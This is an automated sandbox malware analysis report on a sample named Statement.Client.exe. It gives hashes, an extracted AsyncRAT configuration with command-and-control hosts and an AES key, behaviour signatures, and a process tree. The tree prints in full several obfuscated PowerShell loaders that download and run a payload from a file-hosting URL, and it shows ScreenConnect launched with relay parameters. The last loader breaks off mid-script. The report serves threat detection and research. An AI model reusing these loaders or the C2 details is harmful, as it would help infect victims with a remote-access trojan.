Analysis

  • max time kernel
    145s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    06/12/2024, 16:04 UTC

General

  • Target

    Statement.Client.exe

  • Size

    81KB

  • MD5

    096c0bb01099ae31a11f12c4643b02de

  • SHA1

    5fecc71c4991d3bd64142fee92d5dd9cb689743c

  • SHA256

    72b2d87cf942f3c5dd92927098f59813c86ff94aa7805f82c70fec379a91e371

  • SHA512

    52395e5e344cb6ce5e9b92db081c8c5ca240df18917c25ba876793dcee4774b42b80356a6cf47d854a2f5a5179f4ffd0e64cfa79056960b9f479e0e1934b428c

  • SSDEEP

    1536:BoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaWPBJYYb7xJoZ:7enkyfPAwiMq0RqRfbaWZJYYbj0

Malware Config

Extracted

Family

asyncrat

Version

| Edit by Vinom Rat

Botnet

Default

C2

hegazy.ddns.net:6606

hegazy.ddns.net:7707

hegazy.ddns.net:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
lDH3ddaoYkvUIUARvoPatIHB8qXKo1yR

Signatures

  • AsyncRat

    AsyncRAT is a remote access tool, written in C#, designed to remotely monitor and control other computers.

  • Asyncrat family
  • Detected Nirsoft tools 1 IoCs

    Free utilities, often used by attackers, that can recover passwords, product keys, etc.

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Manipulates Digital Signatures 1 TTPs 2 IoCs

    Attackers can apply techniques such as modifying the Authenticode and Cryptography registry keys so that their binary is treated as validly signed.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempts to gather information on the host's network.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Statement.Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Statement.Client.exe"
    1⤵
    • Manipulates Digital Signatures
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3320
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
      2⤵
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3288
      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe
        "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe"
        3⤵
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:3356
        • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe
          "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:4232
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 308
      2⤵
      • Program crash
      PID:2168
  • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe
    "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
    1⤵
    • Sets service image path in registry
    • Drops file in Windows directory
    • Executes dropped EXE
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:512
    • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe" "RunRole" "7d97551f-5fd1-435c-b5d6-4a43e6e2311c" "User"
      2⤵
      • Checks computer location settings
      • Drops file in System32 directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:704
      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe
        "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe" "RunFile" "C:\Users\Admin\Documents\ConnectWiseControl\Temp\Caproyl.vbs"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:796
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Documents\ConnectWiseControl\Temp\Caproyl.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3208
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sulciform Sheephead Datovekslen Aliped #><#Unfulfilled Tibbu Domptr Aftereye Blizz #>$Hydropolyp='Stempellovenes';function Matranee($Pseudocyclosis){If ($host.DebuggerEnabled) {$Mineraloliernes=4} for ($Phenanthrene=$Mineraloliernes;;$Phenanthrene+=5){if(!$Pseudocyclosis[$Phenanthrene]) { break }$Quods+=$Pseudocyclosis[$Phenanthrene]}$Quods}function Oratoriske($jennifers){ .($Fugtigvarmes) ($jennifers)}$Sortermulighedens=Matranee 'PerinMisfE pliTSt.l.overWFotoeordsBVe,ec.esoLVirkiThisEOutbnHomoT';$Svinget=Matranee 'StedM.agroK ntzSpooiZayil TollButta.ata/';$Propupa=Matranee 'NotaTSt fl FinsAfst1Spad2';$Reactivations220='suit[F.ydnPen,e FoltNor,. FilSFlagEPotsrBevgVEs.diRetrc SleE RespSchoORatii G.on SkitTikmMPizeaNonpNSupea hrgBlueeUndeRdann]pseu:Tran:negeSVaa ePhrec De UForsrShipiVietT Te yTraspMaanR Pr,oPinuT.ondO .ulCEnkeOElveLTown=H rs$HoroP .orRP,ckOVidrPAnglUF.rrp artA';$Svinget+=Matranee 'Mea 5Adha.Gen.0 el Livs(NairWForpiJenhnUn ad VisoEstrwSupesArti Fe eNRampTGrie Disc1Udsl0Dksk.Jo f0Fixe; Rea DueW.egliHindnAfsk6 Vis4Brmm; S n D.ax Ls,6Best4U ex; Gyn MigrrAfdav Byb:Om a1Soci3Part1Opiu.Ma a0Dag )Rhap L ngGfineeSkolc ailkHexaoCo,d/Tena2 llo0Skov1Shak0Pi,c0S up1Inci0Kons1 rse JvniF Snai inarSquie potfOutdoBofoxF du/Slyn1.isc3Au t1 Sel.Udda0';$vedhnget=Matranee ' MilUe poSr,maEMundRMor.- E sABr pGEtr,e Paan HalT';$Yephede=Matranee 'Rillhfilot psptrefepForss St,:mili/Bioc/ brnfM toi anolOrgaePhotdAfsln Sem. 
SkaeWontuPerg/ istlAutomStorjInt,MMimb1PuppIIl.otC dbiPlusFDirtCPaavHkarrjWitcYFo,fAIns 4Ac iJFoneNInapRO erBAbutYAperBReit3Fleh4kbst/Fagov,undiDefieUncot PrenStana Se mmisv.Galat Milt Kphf';$Kapitulant=Matranee 'Cusc>';$Fugtigvarmes=Matranee 'F,lmiPeixESuk x';$Demotes='Duperede';$Natvgterstat='\Landbrugslovenes201.spr';Oratoriske (Matranee 'Caus$ TragAldeLSys oAsseblyseaYderLDele: ParFRyaeo,eksRw rcl K lyOraiS.otoTBe ye lanl igasS.igE K nsOve SVindy FloGFernt ,je= Ben$MaitE S.rnTic vNett: ahaForbpK biPTrskDPe,fAEl qtFe tASile+Bi.e$Kli N Plea FlotNonrvEulaGCrimt An EKak,rSvarsTragtSat.ANuclT');Oratoriske (Matranee 'Land$TrusGUdl.lAktiO goab StaA ftelPhot:KkkegSeedUForlMLubrmSor I SubH HonJ mi.uBerulWhipE U st SdeSInfe=El,k$S.miYAchrEDidePkabiHDdsdE Co.dReane hav.kuliSB.odP AstLu.deI .ontPri,(Magt$,ociKenqua eplP AffIImpuTscisu Su.lCon ABla NO tiTErst)');Oratoriske (Matranee $Reactivations220);$Yephede=$Gummihjulets[0];$Prepender=(Matranee 'F,st$CeleGKlevLNat,oFng B,ntiAHec.LD ce:PseufGnosiBrugn KriiC traEftelUnde=gr.pNRus,e forWGrov- AfkO ElaBTareJSlineVirkcBerrtCons PentsenclYEmicsCowltMaroEMassmDyst.Bede$EncuSInkaolactrConctUdtrE Ap rBagsMIncoU F.rL kooIFamiGSvunhB tie Ud DEnameBag nfo kS');Oratoriske ($Prepender);Oratoriske (Matranee ' Fre$Ska,FVenti ygnnDom,i Mugahyl.l O e. UndH atheAfruaS mfd De eAfslrBrudsdiso[Cre $skrdvServeblo dKapehInt nSubcgFrade EpitWere] Ker=Stib$ fsvSSkolvBe eiQuidnA prgGeneeSl,tt');$Downsteepy=Matranee ' Pol$RecaFWar i Subnw,iniBenzaPhonlKrys. 
GjoD,elgoBar w,enonBr llVandoParaaC rkds rvFMakuiAngulD ese A t(Nonh$KoksY emaeFarmpOverhInfieInfldF ale.van, pec$U.dePInd.rAssaoelengOverr R naServmDomss SlayDelfs TimtAcceeDd imOutseTjrnrCrysnInsteKontsWass)';$Programsystemernes=$Forlystelsessygt;Oratoriske (Matranee ' .ru$Swi gBenaLAld.o.kieb PriaMisclRedi:DyresLikvAPhylM SigLHy oiFo uVOlavS ttef Appo ProRStadh,ondoGiggl k nDep,ie ca.NDredEAdmiSFa e=Snea(Ind TTvrmEdelpsAport bro-TriupDig A.yttT solHPlad Br,g$ArsePUpasRRe poFul GPer ROpgaABj gMtir SInt YBy,dS Tr tPredESjokm LunEOutsrHol nOptieNongsTus )');while (!$Samlivsforholdenes) {Oratoriske (Matranee 'Goth$Non.gBorglSammoFeltbCi.uaF lolChap:KommHHenryO.erpHelveKonsr C,no eksx Logy enogHjere ftenAp liUdvisBudgeFrum=Slud$NordPIronh,hrie,ectnGkkeaUndenPra,tDoorhKu irMedie Udsn mageFabunP aip P.euNo.etH sss LortBroanS kkiHjo.n B,agSkrys') ;Oratoriske $Downsteepy;Oratoriske (Matranee 'AcidSFoldtFalla NyhrIn,etRefr-HalvSReirlPs,kem trE strpKrel Rhyn4');Oratoriske (Matranee 'Basi$ EmaGVaanlReveo,xciBEvanaAbo LPai.:V ndS AbeAStteMVoldl amfIboolvSha.ST pef depop.osRPuckHSubaoPerflDuodd armEDefiN Aa,eSalgSHenr=Uni.(FeritFgteeHospSsikkt sla- holPAcriAUdbatSwi hAn,u Need$krlip si RDaglOKalfg anRBibeaCaecm GassEremy PlesPu,kT rdeECadmM ypledommRPlannRes e SkeS yth)') ;Oratoriske (Matranee ' Hyp$SkrlG Begl SkuOGranBjoula entLArka:Skuefg nkASkjorKratVK kke skrLPatrAHyd D,andehje RAsa NA.skE Und=sv m$Melog OpbLAfs.Om.taBCafaAAlmel Re :S inUAi fD FinRUdtoE CymdTorgE inLImpisS ineOri rUndenUig,EThanSFors+Eska+Pa,e%Cent$ KnuGmyloU O eM ,alMOverIConcHChi JHoldUAbr.LforsEblanTTanksFot,. SelCMultOElituAmernNonct') ;$Yephede=$Gummihjulets[$Farveladerne]}$Annekteret42=299776;$Tentorial=31265;Oratoriske (Matranee ' Pan$Ecceg Br lAnkeoanliB M lAE islGuts:StikSFardmReplaInteA pheSMul KnonrO Me,VG anePaganO,blESustSBol. 
Su,=Unde Vi GSku.EPlayT Unp-O,bic rroUnmenNe sT AbaeB,azNT.aaT Plo Eje $ C.mPUddaR RatoOctegBdrmRDaarAFo,smBucosFaluYFoyaSFristLdgoe HypML geEMindrDsn NEmbuE ejs');Oratoriske (Matranee ' Ove$ HjegOst lV lko DvabSelvaEjstlhet : UndMEkspaAppes .likTra i,asvn Ca,tUdsviKonddcabb Proj=Shet Mar[Sur.S LgeyPreasVirktSzl.eVandmCard.,rolCSerboTrngn Birv ate Botrrundt,ymn]In e:Pil :BidsFSkinrOpsto premibr BGu daSamasOunceCa,t6Tea 4Sku SSylltNonir ZiriTelen.ajogInda( S,u$ iriSDopimRemia.reeaBenzs Lisk UndoCostv V seSkrinOdiseSpidsi it)');Oratoriske (Matranee 'Fuks$SeptgCantlProvO anbGramARedeL ong:PhrademboI AhaA I tPHer,EL euRho eS Ind1,tal4K ea2Niff Sier=B ck Sha[ AvnsKrn yPrevSS lvTRn eERataMS,te.letuTIndkeRuskxChrotCabi.TeraE IsoNUrt,CGenboB eddDownIToriNSup gWarm]Trim: Sou:Hem aFor,sHaa cProtiUdv,i im.Str,G.lasENegrTEf,eSAv rTKalmRKongiE panPudeg Ka.(Deri$M,liM,ereABortsu fekMomsi HydnDweetWoozI erud dup)');Oratoriske (Matranee 'Moon$Indvg TorlSan oMagnbPillASveslStat:Blo.vAlcaEK lllOs uaLoxotLatheMarqDY te=Berk$ V jDOveriFor a TerpIn,eeTetrr P,lS U,b1 Reg4Unal2 Hyd.BogtSFor UPladBPeptSMasstForeRVindiIn pNQuirgAfre( Fac$Sky,AS ccNbalanTidseSp.tKApp,TContEQuinrTrykeCacotbrug4Ina.2Demi,Vehe$Tankt B,leUvitn.mboTAccooEastREupni OutAhurtLOm l)');Oratoriske $Velated;"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2704
    • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe" "RunRole" "4caf7e11-9a3b-435a-900c-87bb3cb25cf1" "System"
      2⤵
      • Drops file in System32 directory
      • Executes dropped EXE
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      PID:756
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c "C:\Windows\SystemTemp\ScreenConnect\24.3.7.9067\hVqvsfdxfEibrun.cmd"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1608
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -windowstyle hidden "<#Intermorainic Karines Pitman Unpertinently #><#Timetalsnedskringernes Cogwheels nongeographic Stammendes leans #>$Loopier='Gaminesque121';function Levnedsmiddelkontrollen($Adfrdsnorms){If ($host.DebuggerEnabled) {$Oolemma=4} for ($Brnderslevbo251=$Oolemma;;$Brnderslevbo251+=5){if(!$Adfrdsnorms[$Brnderslevbo251]) { break }$Emberizinae+=$Adfrdsnorms[$Brnderslevbo251]}$Emberizinae}function Pedelion($Operationsplanernes){ .($Mirounga) ($Operationsplanernes)}$Shilingi=Levnedsmiddelkontrollen 'LammnChesE Co tSyne.ShriwSl kEKderBShogC PreLDisti B gEIn.aNAu hT';$Hemicircle140=Levnedsmiddelkontrollen ' SanM Tigo PerzUk liPolylOpsal Outa Rin/';$Umoraliteters=Levnedsmiddelkontrollen ' T aTTveslBesvsThau1So s2';$Phrenologists='Arom[ DenNburgefu iTPr.o. Un sOpaceKatarPro,vJvnaI vecR gieFestp.ilkO LeviTranNBalttLd eMRnenA A,snkadmADomsGSyncEforerFi,m]k,de: ata:IndiSUn,aE p.rcUnvauHypoR ItcIMytit PhaY,ionPFaneR roOJo dtCereoSpi,c KilOguerLGoos= Oli$fremU Ho.MEc ooKoldR PrvAHva L OpriNonctPhi,EIndeTForteWettRForfs';$Hemicircle140+=Levnedsmiddelkontrollen 'Qu e5Use,.Twad0C nu Kon(StarWWeaviOve nathadT lsoO,chw Achs Sne B,ggNUhaaTLoet Unde1Refe0Buff.Udbl0By.r;Bauf Mo Wmycti Tesn reh6 Gen4Ov.r;Zoog VexixNonp6Stri4Deca; D f Noc,rudrmvOpga:A.ns1S yl3Flac1K.nd. 
pil0Mor,)T es LegGU cae istc.arak.ranoSked/Gjal2 isa0Sten1Lae.0Unfr0Anst1T rk0 Sem1Vaca pshFAnaci ValrRunoeS agfLittoFolkxFors/smal1 Afl3 E.t1Fakt.Topm0';$legalisere=Levnedsmiddelkontrollen 'AadaUVul SCoc.EBor.RMalk- HklaLithGS.cueXyphnEvant';$Sandhedsserumer=Levnedsmiddelkontrollen 'SterhKonftTeglt s,vp oadsCiv : Cor/ ork/Udstf ArciHaanlCon.eVoucdVi nnZero.Sekue Fe uUnab/Syenl Gram slbjKitcMP.ro1UnhyI opit ViriHvl FFj.rCGalaHOndsjPreiYHe aA.eac4DataJAutoNI,reRNeurBFrizYBautBB st3Unid4Stat/ inddHesti Ra fTrusfBeg,e yrirArdueCrennSkams SlarSid k insk Pare UndrProk.SklmdEne.s,elep';$Fascineredes=Levnedsmiddelkontrollen ' San>';$Mirounga=Levnedsmiddelkontrollen ' AnoiBl aeA.tix';$Aspring='Imperceptibly';$Wernas='\Intimidity.Alb';Pedelion (Levnedsmiddelkontrollen '.run$gtheG PenLHan,oSmulbVersaBabalS um:SrloAPiddlBrneKLacuo MdeHs rjOHapllcaz ISkafs rteL.mir eurePer.tOmty=Agro$ Ad EHofdNAntivStrr:R gnaEk,aP aboPFi tD,uspaStruTGrova emm+ P e$adelWE.seeMinirrillNCycaAP.isS');Pedelion (Levnedsmiddelkontrollen 'Pinu$ onfGva el nto.polb.ilbaUpholChe : .ulEPrelO Un.NMet,iAf iSallaM Do S Vic=Ha e$Afbls nsha ennF.atDF mshSeclE Tridkon,SBi.oS Emme,utir vauSepaMMargEMickrBek,. UndSHegePS bhlAnstiDistTcopa(Boos$TinsF me a aglS aadcPreri BlanFellEholorPiale ArodInvaeSimpSIn,u)');Pedelion (Levnedsmiddelkontrollen $Phrenologists);$Sandhedsserumer=$Eonisms[0];$dommerkendelsernes=(Levnedsmiddelkontrollen 'Komp$DizzG,rkilcorrOTrifb obbA,elolTram:Sce ITvedtBoniE .ifrMimiaT,rpTResseE uiLMarkYOkse=AssenSwerePantWReav-GtteOBgebBTri.jConverecoc kaT Pe. 
Am eSPa.tyPo,ts relTSvinEne,rM Epi.Pr,o$GaliSKingH BrniLa nL PadIForpNUncegBewiI');Pedelion ($dommerkendelsernes);Pedelion (Levnedsmiddelkontrollen 'Extr$cistICl.rt .leeNut,r SynaSe ttBrone P.ml CacyChea.D ssHSprieg laasnevd Mase Char GensInad[ An $Glacl We eW odgShedaGruplGatei FfesL.vie NonrNonme Sam] De,=Unit$FemeH Tupest.imMul iHegecYuckiStoirVrdic RaalTi beUnhy1,arm4Cool0');$Seattle=Levnedsmiddelkontrollen 'Porn$airwIMetat,lageRyper DefaPenst lyseBroel LexyHur . ekDCrinoMariwGullnPaaslsacaoFeataQuizdVlt.F,etiiSp ilUnace Fem(Hu o$ narSMurmaPerpnBirgdPorchConneLi edRustsOlivs Rede Nonr ,inuLetfm ShaeIrrarform,Skik$PjevSUn et t no Blor ,oseNemesTimosUnautEnderV nteHaulnR,coe Ca,)';$Storesstrene=$Alkoholiseret;Pedelion (Levnedsmiddelkontrollen 'Bod,$ legGSubjl ,enOArkib R sAOmvelMyel:SharRSl,teSkrolCo ooKichAReguD OpeEArmaDguin2Summ5 Lig4 O r=Cons(LygtTTi,sESer,sintitPike-RevePSikkaFurrTAv.sHHove phe$For.sE,isttjenoDeporIsseE Mi SFjorSP.olTMcfaRstoreSydlNS anES ak)');while (!$Reloaded254) {Pedelion (Levnedsmiddelkontrollen 'Dram$UdbegDat,lEt.noEmanbportaUprclU.by:O erQP ogyUnth= Sys$Unt P BlolfremuSmugkFum kFutue') ;Pedelion $Seattle;Pedelion (Levnedsmiddelkontrollen 'ForkSLuksTNedgA Star AntT um-.ildsOme.L Note Intea.slp Smi Math4');Pedelion (Levnedsmiddelkontrollen 'Libi$GelagCartlUnaco ty BIsotAco eLTrea: MacRBabieJvneLNubioPolyAFcytdTilseAffldFe,t2 Fll5Kamp4Regn=Gill(He,stMandEAvlssN tctTra,-usurPCo,paRi,at Urohpirr Arb$InteSTri.T,gesOShivr R dEjerksPen.S raT S oR BeleFactNR tseBu m)') ;Pedelion (Levnedsmiddelkontrollen ' Ge $InjuGHje lBowloHuspBFlysAOutsLStiv:CyanS numiUdt LAntiIRensc ppeeMannOtrylU udtsMero=Sed,$E.udg ekelmyxoOTotab ipoa ForlOpka:SekrCSantoCry,nAfkvGGesjeStrinAsseI rema C,tlChacN.orsEBrneSNonosRach+Fibe+phot%Be,i$IllgESka.oFluin BemIUbevs UnsmAfpaSVagt. 
T kC inOops u AfvN UfoT') ;$Sandhedsserumer=$Eonisms[$siliceous]}$Diacetylmorphine=330880;$Termined233=29940;Pedelion (Levnedsmiddelkontrollen 'Sena$ ktig tralSalaO ondBAcidaprivlKome:VaabKAppra,pusr Camt deno dehnCrzeNStnna SmuGBommesymfrVa cNHisteS,de Gene=Spir acgRaceeOptaT O,p-SvigcSchnoMe iNTet TBedee.chnnBetrTGian B ll$Bef.s ProTRus oUd.eRHaldE.iggs Gi s indTpatrrTegnE FarNUdtre');Pedelion (Levnedsmiddelkontrollen 'Hunl$g uegSubclRomeo HelbtaktaCauslEl,c:Gu rC foraMetarUdslr eariC yoaMossg,chieSy.olLacreA sks ntrsSo a Sou =Lyse M dv[BushSDampyDarrsGlaitFolkebalsmp.st.U flCDiptoN ncn ydvInteeShanrPolyt utt]Sild:kar : Id Fse erRescoSydkmTer BRei aUnwisRampe tvl6 Ti,4AntiSHjemtl,nsrB.dei Nitn progLapi(Sgel$ParaK annaTamar KontFaaroAdumntopmnFlgeaKrafg BoreTrikr Komn .rieHatp)');Pedelion (Levnedsmiddelkontrollen 'Lted$U prgSlv.l SepOFiguBG,atA abel St.:Spi.v HanaWharAPamfNI dbITuskNSpo G ngisFupmHprogUV rmsbest Misp=Al.o Sml[ xons UdkYDom s SkatFleteGaram Boe. H.eTPrkeETra X PreT Sap.SpytEAfmnneutycSelso asddGrynIUbehn AveGPuff]Rnne:,als:Indba,iazs K,aCEfteI Du i Squ.R jsGF.rfe edT ProsTilttSe vRHumaiSubwnforigno,c(Semi$choncmasha ManRLu eRQuarI CleaKarbG SadESp rLMa oE NorSM biSSmu )');Pedelion (Levnedsmiddelkontrollen 'Pick$Byn.gTubal ByloAntib fora NotL Tak:A siuTomiNPerib KnoUVareR Rene SmaACeruUSekaC Linr QuaaElmatAncyiAndac andaD izlTyndl trayLumi=Op t$S,krvEn,raStapaforenMicrIKa,vn SekgStjlSCu hHOkkeUI ersCep .serisLodeu erbMiliSNon TUnherMaggI UdhnMartGMall( Sh $ StdDD olI slaA Un c amme EliTor,hyUdvilE,spmDrmmOB lir Timp Ku,HZinkIBothn Kone Y,s,.kib$UnmetcentEBe zrToddmperii ocN MolE,kanD Gen2 For3Sira3Komm)');Pedelion $Unbureaucratically;"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1660
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Intermorainic Karines Pitman Unpertinently #><#Timetalsnedskringernes Cogwheels nongeographic Stammendes leans #>$Loopier='Gaminesque121';function Levnedsmiddelkontrollen($Adfrdsnorms){If ($host.DebuggerEnabled) {$Oolemma=4} for ($Brnderslevbo251=$Oolemma;;$Brnderslevbo251+=5){if(!$Adfrdsnorms[$Brnderslevbo251]) { break }$Emberizinae+=$Adfrdsnorms[$Brnderslevbo251]}$Emberizinae}function Pedelion($Operationsplanernes){ .($Mirounga) ($Operationsplanernes)}$Shilingi=Levnedsmiddelkontrollen 'LammnChesE Co tSyne.ShriwSl kEKderBShogC PreLDisti B gEIn.aNAu hT';$Hemicircle140=Levnedsmiddelkontrollen ' SanM Tigo PerzUk liPolylOpsal Outa Rin/';$Umoraliteters=Levnedsmiddelkontrollen ' T aTTveslBesvsThau1So s2';$Phrenologists='Arom[ DenNburgefu iTPr.o. Un sOpaceKatarPro,vJvnaI vecR gieFestp.ilkO LeviTranNBalttLd eMRnenA A,snkadmADomsGSyncEforerFi,m]k,de: ata:IndiSUn,aE p.rcUnvauHypoR ItcIMytit PhaY,ionPFaneR roOJo dtCereoSpi,c KilOguerLGoos= Oli$fremU Ho.MEc ooKoldR PrvAHva L OpriNonctPhi,EIndeTForteWettRForfs';$Hemicircle140+=Levnedsmiddelkontrollen 'Qu e5Use,.Twad0C nu Kon(StarWWeaviOve nathadT lsoO,chw Achs Sne B,ggNUhaaTLoet Unde1Refe0Buff.Udbl0By.r;Bauf Mo Wmycti Tesn reh6 Gen4Ov.r;Zoog VexixNonp6Stri4Deca; D f Noc,rudrmvOpga:A.ns1S yl3Flac1K.nd. 
